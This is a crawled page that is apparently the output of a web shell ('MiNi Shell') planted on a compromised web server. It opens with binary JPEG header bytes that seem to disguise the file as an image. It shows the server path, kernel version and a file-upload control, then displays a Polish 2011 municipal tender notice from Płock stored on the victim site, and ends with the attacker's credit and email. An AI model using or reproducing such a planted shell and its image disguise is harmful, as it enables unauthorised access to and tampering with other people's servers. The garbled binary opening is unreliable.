JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110517/139613-N-2011.html

<p class="kh_header"><b>Płock: Przeprowadzenie analizy Miasta Płocka w zakresie sytuacji społeczno - ekonomicznej oraz dostępnych terenów inwestycyjnych Miasta , opracowanie polityki rozwoju Miasta Płocka na lata 2012-2022</b><br>
<b>Numer ogłoszenia: 139613 - 2011; data zamieszczenia: 17.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Płocka , ul. Stary Rynek 1, 09-400 Płock, woj. mazowieckie, tel. 024 3671598, faks 024 3671598, 3671615.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ump.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie analizy Miasta Płocka w zakresie sytuacji społeczno - ekonomicznej oraz dostępnych terenów inwestycyjnych Miasta , opracowanie polityki rozwoju Miasta Płocka na lata 2012-2022.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zamówienia Wykonawca zobowiązuje się do opracowania polityki rozwoju gospodarczego Miasta Płocka we wskazanym zakresie:

Kluczowe etapy

1. Analiza sytuacji społeczno-ekonomicznej Miasta (analiza uwarunkowań społeczno-ekonomicznych prowadzenia działalności inwestycyjnej w Płocku).
2. Ocena potencjału Miasta w zakresie pozyskania inwestorów zewnętrznych.
3. Formułowanie celów polityki rozwoju gospodarczego.
4. Przygotowanie krótkookresowego programu rozwoju gospodarczego Miasta.

Etap I - Analiza sytuacji społeczno-ekonomicznej Miasta.
1. Uwarunkowania Lokalizacyjne Płocka.
2. Uwarunkowania społeczne i demograficzne Płocka.
3. Sytuacja gospodarcza Płocka i Regionu.
4. Rynek nieruchomości w Płocku.
5. Dostępność infrastruktury transportowej.
6. Dostępność i oddziaływanie instytucji otoczenia biznesu w Płocku (współpraca biznesu z nauką).
7. Kierunki rozwoju gospodarczego w obowiązujących dokumentach strategicznych Płocka.
8. Analiza SWOT dla prowadzenia inwestycji w Płocku.
9. Praktyka Płocka w pozyskiwaniu inwestorów (działania i przygotowanie instytucjonalne).

Etap II - Ocena potencjału Miasta w zakresie pozyskiwania inwestorów zewnętrznych.
1. Identyfikacja kluczowych obszarów możliwych do wykorzystywania pod inwestycje (ścisła współpraca z przedstawicielami Miasta).
2. Charakterystyka tych obszarów pod względem kluczowych cech inwestycyjnych oraz określenie możliwego przeznaczenia tych terenów, wskazanie potencjalnych oczywistych ograniczeń w wykorzystaniu dla niektórych funkcji.
3. Ocena potencjału inwestycyjnego Miasta pod względem ilościowym i jakościowym.

Etap III - Formułowanie celów polityki rozwoju gospodarczego (we współpracy z przedstawicielami Miasta).
1. Analiza SWOT
2. Uwarunkowania rozwoju gospodarczego Miasta Płocka (podsumowanie i wnioski na podstawie przeprowadzonej analizy):
a.i. zewnętrzne (niezależne od Miasta)
a.ii. wewnętrzne (zależne od władz Miasta, w tym oferta terenów inwestycyjnych, działalność lokalnej administracji, wsparcie Miasta dla edukacji w obszarach tzw. zaplecze dla inwestycji, itp.).
3. Ocena konkurencyjności Miasta Płocka na tle uwarunkowań i rozwoju rynku inwestycji w Polsce.
4. Identyfikacji branż i kierunków inwestycyjnych najbardziej pożądanych i prawdopodobnych w Płocku.
5. Sformułowanie polityki rozwoju gospodarczego dla Miasta Płocka mającej na celu zwiększenie atrakcyjności inwestycyjnej miasta (w tym: misja celów strategicznych, celów pośrednich oraz sposobów ich weryfikacji).

Etap IV - Przygotowanie krótkookresowego programu rozwoju gospodarczego Miasta (we współpracy z przedstawicielami Miasta).
1. Zdefiniowanie krótkookresowych działań (np. 4 -5 lat) w zakresie realizacji polityki rozwoju gospodarczego Płocka wraz z terminami ich realizacji z podziałem na:
a.i. działania merytoryczne,
a.ii. działania administracyjne (z zakresu obsługi inwestora).
2. Zdefiniowanie potencjalnych partnerów w realizacji każdego z działań wraz z ich rolami.
3. Określenie w szczególności roli i zadań Miasta Płocka w realizacji każdego z działań, w szczególności w zakresie przygotowania terenów pod inwestycje.
4. Określenie korzyści z realizacji i mierników oceny poszczególnych działań.
5. Wskazanie potencjalnych źródeł finansowania każdego z działań.
6. Opracowanie wieloletniej prognozy finansowej budżetu Miasta, jako jednego ze źródeł finansowego dla realizacji programu rozwoju gospodarczego.
7. Sformułowanie wytycznych do monitorowania i aktualizacji programu rozwoju gospodarczego Miasta Płocka..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.31.14.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował projekt związany z doradztwem i wykonaniem analiz tożsamych z przedmiotem zamówienia dla jednostek samorządu terytorialnego o wartości minimum 150 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Zamawiający zaprosi do składania ofert wstępnych Wykonawców, którzy spełniają warunki udziału w postępowaniu, nie mniej niż 3 i nie większej niż 5 .
Jeżeli liczba Wykonawców, którzy spełnią warunki udziału w postępowaniu będzie mniejsza niż 3 zamawiający zaprosi do składania ofert wstępnych wszystkich tych Wykonawców. 
Jeżeli liczba Wykonawców, którzy spełnią warunki udziału w postępowaniu będzie większa niż 5, do składania ofert wstępnych zostanie zaproszonych 5 Wykonawców, którzy uzyskają najwyższą liczbę punktów  w kryterium -  wartość zrealizowanych maksymalnie 5 usług związanych z doradztwem i wykonaniem analiz tożsamych z przedmiotem zamówienia w okresie 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.
Wykaz usług wraz z dokumentami potwierdzajacymi należyte wykonanie usług należy załączyć do wniosku.
Ocena wartości usług zostanie dokonana wg wzoru
WU  =   wartość usług badana : najwyższa wartość usług  x 10 pkt = ..........pkt

Jeżeli wykonawca wykaże wartość usług w walucie innej niż PLN , wartość ta zostanie przeliczona wg kursu NBP z dnia składania wniosków o dopuszczenie do udziłu w postępowaniu</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian w zakresie:
	1) wynagrodzenia w przypadku ustawowej zmiany wysokości podatku VAT;
2) terminu realizacji przedmiotu umowy ze względu na zaistnienie klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki, niekorzystne warunki pogodowe.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Płocka,  pl. Stary Rynek 1 - Biuro Obsługi Klienta - stanowisko nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2011 godzina 11:00, miejsce: Urząd Miasta Płocka,  pl. Stary Rynek 1 - Biuro Obsługi Klienta - stanowisko nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1). Wykonawca może złożyć tylko jeden wniosek o dopuszczenie do udziału w postępowaniu; 
2). Wniosek musi zawierać następujące informacje: nazwę Wykonawcy, jego siedzibę, dane teleadresowe; 
3). Wniosek musi być sporządzony czytelnie, w języku polskim i podpisany przez Wykonawcę; 
4). Postępowanie jest prowadzone w języku polskim, dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniami na język polski, 
5) .Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę; 
6.) Wniosek, oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu muszą być opatrzone podpisami osób uprawnionych do składania oświadczeń woli w imieniu Wykonawcy, wymienionych we właściwym rejestrze lub ewidencji, bądź umocowanych przez te osoby do składania oświadczeń woli na podstawie odrębnego pełnomocnictwa. Pełnomocnictwo (w formie oryginału lub kopii potwierdzonej notarialnie) należy dołączyć do wniosku. W przypadku potwierdzania dokumentów za zgodność z oryginałem, dokumenty te należy opatrzyć podpisem Wykonawcy i klauzulą - za zgodność z oryginałem. Podpisy Wykonawcy na dokumentach muszą być złożone w sposób pozwalający zidentyfikować osobę podpisującą.
7. Osobami uprawnionymi do porozumiewania się z Wykonawcami są: 
Joanna Michalak- Biuro Obsługi Inwestora - ( 24) 367-15-84
Joanna Michniewicz  - Wydział Zamówień Publicznych,tel. (24) 367-16-16 
pl. Stary Rynek 1, pokój nr E-52, w godz. pracy Urzędu /w zakresie SIWZ/..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com